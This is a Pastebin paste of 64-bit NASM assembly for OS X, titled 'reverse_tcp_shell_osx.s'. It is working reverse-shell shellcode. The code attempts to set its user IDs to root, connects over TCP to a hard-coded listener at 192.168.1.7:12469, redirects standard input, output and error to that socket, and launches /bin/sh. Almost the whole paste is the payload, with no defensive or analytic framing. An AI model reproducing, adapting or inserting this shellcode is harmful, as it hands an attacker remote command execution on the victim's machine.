Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ;//
- ;// reverse_tcp_shell_osx.s
- ;// tested on 10.8.2 - should work on 10.7
- ;//
- ;// Created by 0xACAB on 2/16/13.
- ;//
- ;//
- BITS 64
- ;syscalls and arguments
- %assign sys_socket 97
- %assign sys_connect 98
- %assign sys_setreuid 126
- %assign sys_exit 1
- %assign sys_dup2 90
- %assign sys_execve 59
- %assign SOCK_STREAM 1
- %assign AF_INET 2
- global start
- section .text
- start:
- _setup_nix_sys:
- ; OS X requires SYSCALL_CLASS_UNIX set in upper order bits when using syscalls
- xor r9d,r9d
- mov r9b, 0x02
- shl r9, 24
- _setreuid:
- ; set real and uid to 0 for max privileges if we can
- mov rax, r9
- add al, sys_setreuid
- xor edi, edi
- xor esi, esi
- syscall
- _socket:
- ; create TCP socket
- mov rax, r9
- add al, sys_socket
- mov dil, AF_INET
- mov sil, SOCK_STREAM
- xor edx, edx
- syscall
- _connect:
- ; move sockfd into rdi (1st param for connect syscall)
- mov rdi, rax
- xor eax, eax
- push rax
- mov rax, 0x701a8c0b5300103 ;192.168.1.7:12469 + AF_INET in network order (0002 masked)
- sub ax, 0x0101
- push rax
- mov rsi, rsp
- xor edx, edx
- mov dl, 16
- ; connect to 192.168.1.7:12469
- mov rax, r9
- add al, sys_connect
- syscall
- ; check if all good, otherwise, exit
- xor esi, esi
- cmp sil, al
- jb _exit
- _connected:
- ; connect stdin(0), stdout(1), and stderr(2) - note, rsi should still be 0x0; rdi should still have sockfd
- mov rax, r9
- add al, sys_dup2
- syscall
- cmp sil, 2
- inc sil
- jbe _connected
- _run:
- ; execve to /bin/sh
- mov rax, r9
- add al, sys_execve
- mov rdi, 0xff68732f6e69622f
- ; create null byte to terminate properly
- shl rdi, 8
- shr rdi, 8
- push rdi
- mov rdi, rsp
- xor esi, esi ; char *argv[] = null
- xor edx, edx ; char *envp[] = null
- syscall
- _exit:
- mov rsp, rbp
- mov rax, r9
- or al, sys_exit
- xor edi, edi
- syscall
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
